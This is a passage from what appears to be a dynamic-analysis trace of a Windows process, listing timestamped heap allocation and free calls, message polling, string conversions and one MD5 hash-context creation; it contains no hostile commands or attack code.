0x2e54de8 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.389] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0256.389] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0256.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0256.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0256.390] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0256.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0256.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0256.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0256.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0256.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0256.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0256.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0256.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0256.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0256.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0256.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.395] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0256.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0256.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0256.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0256.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0256.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0256.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0256.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ec8 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0256.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0256.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0256.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: 